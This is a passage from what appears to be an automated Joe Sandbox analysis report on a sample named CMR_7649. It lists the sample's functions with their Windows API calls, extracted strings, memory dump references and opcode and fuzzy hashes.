                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                • API String ID: 0-1603158881
                                                • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
                                                • Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
                                                Function 004485CB Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateMenu.USER32 ref: 00448603
                                                • SetMenu.USER32(?,00000000), ref: 00448613
                                                • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                                                • IsMenu.USER32(?), ref: 004486AB
                                                • CreatePopupMenu.USER32 ref: 004486B5
                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                                                • DrawMenuBar.USER32 ref: 004486F5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                • String ID: 0
                                                • API String ID: 161812096-4108050209
                                                • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                                                • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                                                Function 0047679F Relevance: 13.8, APIs: 9, Instructions: 307COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0b34b3a5b5d670eb49a5e2d7b5cd424f37d7569b2aa50e3450060746f4beba41
                                                • Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
                                                • Opcode Fuzzy Hash: 0b34b3a5b5d670eb49a5e2d7b5cd424f37d7569b2aa50e3450060746f4beba41
                                                • Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
                                                Function 00453893 Relevance: 13.7, APIs: 9, Instructions: 158filestringCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                  • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                • lstrcmpiW.KERNEL32(?,?), ref: 00453900
                                                • MoveFileW.KERNEL32(?,?), ref: 00453932
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                                • String ID:
                                                • API String ID: 978794511-0
                                                • Opcode ID: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                • Instruction ID: 27746a5f3a3ee1b1e58f24b17d6851fe0efcb48f315c8e59f2eb92c6bb7fc6f1
                                                • Opcode Fuzzy Hash: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                • Instruction Fuzzy Hash: 295155B2C0021996CF20EFA1DD45BEEB379AF44305F0445DEEA0DA3101EB79AB98CB55
                                                Function 00441165 Relevance: 13.6, APIs: 9, Instructions: 142COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
                                                • Opcode Fuzzy Hash: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                • Instruction Fuzzy Hash: 5B41C4322142405AF3619B6DFCC4BEBBB98FBA6324F10056FF185E55A0C3EA74C58769
                                                Function 00432704 Relevance: 13.5, APIs: 9, Instructions: 42COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: ClearVariant
                                                • String ID:
                                                • API String ID: 1473721057-0
                                                • Opcode ID: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                • Instruction ID: 82c0e5a8bed1f7f82a0371e607e4af2e63fad7cf90771a3a9635cac59f663638
                                                • Opcode Fuzzy Hash: 3e0aaa4ed6ce8b6007e7bdda37da77eca1e161273c17b4dd860825949f7c6934
                                                • Instruction Fuzzy Hash: C301ECB6000B486AD630E7B9DC84FD7B7ED6B85600F018E1DE69A82514DA75F188CB64
                                                Function 0044F0B3 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 389COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: _memmove$_memcmp
                                                • String ID: '$\$h
                                                • API String ID: 2205784470-1303700344
                                                • Opcode ID: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                • Instruction ID: e67660c870af743a7fabfec7c4e9e8b186464fd05e4f656457aecd1ba61caca8
                                                • Opcode Fuzzy Hash: b142f59b2296442f2f65cbc20b4c9604eb51a9c16c8aaf0febd8f469beae5ca2
                                                • Instruction Fuzzy Hash: 5CE1C070A002498FDB18CFA9D8806BEFBF2FF89304F28816ED84697341D778A945CB54
                                                Function 0045EA0F Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 325timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                                                • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                                                • VariantClear.OLEAUT32 ref: 0045EA6D
                                                • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                                                • __swprintf.LIBCMT ref: 0045EC33
                                                • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                                                Strings
                                                • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Variant$InitTime$ClearCopySystem__swprintf
                                                • String ID: %4d%02d%02d%02d%02d%02d
                                                • API String ID: 2441338619-1568723262
                                                • Opcode ID: c256a0e8f79103727635468c6c39d920c699b266699b53e39892a4f9942b48fe
                                                • Instruction ID: 6ef9d3a4897ddb850998a39013325e9d2daf595bbef4806ea59c93c68b265cd6
                                                • Opcode Fuzzy Hash: c256a0e8f79103727635468c6c39d920c699b266699b53e39892a4f9942b48fe
                                                • Instruction Fuzzy Hash: F8A10873A0061487CB209F5AE48066AF7B0FF84721F1485AFED849B341C736AD99D7E5
                                                Function 004091B0 Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 324sleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                                                • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                                                • Sleep.KERNEL32(0000000A), ref: 0042C67F
                                                • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                                                • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Interlocked$DecrementIncrement$Sleep
                                                • String ID: @COM_EVENTOBJ
                                                • API String ID: 327565842-2228938565
                                                • Opcode ID: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                                                • Instruction ID: 079f2a2c733a9a3e151bbe14bd9981fb61a061d6167fc58a91b905d371dd4d86
                                                • Opcode Fuzzy Hash: ca0223daa9e96e83c575322b086aef175ea6f60956e985fc72e5b4b432ff0b62
                                                • Instruction Fuzzy Hash: 18D1D271A002198FDB10EF94C985BEEB7B0FF45304F60856AE5057B392D778AE46CB98
                                                Function 0047025C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 288COMMON
                                                Download Yara Rule
                                                APIs
                                                • VariantClear.OLEAUT32(?), ref: 0047031B
                                                • VariantClear.OLEAUT32(?), ref: 0047044F
                                                • VariantInit.OLEAUT32(?), ref: 004704A3
                                                • DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
                                                • VariantClear.OLEAUT32(?), ref: 00470516
                                                  • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
                                                • VariantCopy.OLEAUT32(?,?), ref: 0047057A
                                                  • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
                                                • VariantClear.OLEAUT32(00000000), ref: 0047060D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Variant$Clear$Copy$CallDispFuncInit
                                                • String ID: H
                                                • API String ID: 3613100350-2852464175
                                                • Opcode ID: a0993396c5b8998c97eda62eb292956ea80afa76050d6468dceab7f561fa4670
                                                • Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
                                                • Opcode Fuzzy Hash: a0993396c5b8998c97eda62eb292956ea80afa76050d6468dceab7f561fa4670
                                                • Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
                                                Function 00401CB0 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 240COMMON
                                                Download Yara Rule
                                                APIs
                                                • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                                                • DestroyWindow.USER32(?), ref: 00426F50
                                                • UnregisterHotKey.USER32(?), ref: 00426F77
                                                • FreeLibrary.KERNEL32(?), ref: 0042701F
                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                                • String ID: close all
                                                • API String ID: 4174999648-3243417748
                                                • Opcode ID: 2f66c89a40f0e85c5d6dd4ec67defb2116834faec8b505cc193eeea2d12e665d
                                                • Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
                                                • Opcode Fuzzy Hash: 2f66c89a40f0e85c5d6dd4ec67defb2116834faec8b505cc193eeea2d12e665d
                                                • Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
                                                Function 0044AA86 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 174networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
                                                • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
                                                • InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
                                                • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
                                                • HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
                                                  • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                                • String ID:
                                                • API String ID: 1291720006-3916222277
                                                • Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                • Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
                                                • Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
                                                • Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
                                                Function 0045FBAC Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 147windowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
                                                • IsMenu.USER32(?), ref: 0045FC5F
                                                • CreatePopupMenu.USER32 ref: 0045FC97
                                                • GetMenuItemCount.USER32(?), ref: 0045FCFD
                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                • String ID: 0$2
                                                • API String ID: 93392585-3793063076
                                                • Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                • Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
                                                • Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                • Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
                                                Function 004352C2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 114COMMON
                                                Download Yara Rule
                                                APIs
                                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                                                • VariantClear.OLEAUT32(?), ref: 00435320
                                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                                                • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                                                • VariantClear.OLEAUT32(?), ref: 004353B3
                                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697812720.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CMR_7649.jbxd
                                                Similarity
                                                • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                                                • String ID: crts
                                                • API String ID: 586820018-3724388283
                                                • Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                • Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
                                                • Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                • Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
                                                Function 0044BBD2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 105filestringCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                • lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
                                                • MoveFileW.KERNEL32(?,?), ref: 0044BC3F
                                                • _wcscat.LIBCMT ref: 0044BCAF
                                                • _wcslen.LIBCMT ref: 0044BCBB
                                                • _wcslen.LIBCMT ref: 0044BCD1
                                                • SHFileOperationW.SHELL32(?), ref: 0044BD17
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1697563017.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1697539618.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697643624.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697672585.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697727194.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1697751348.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
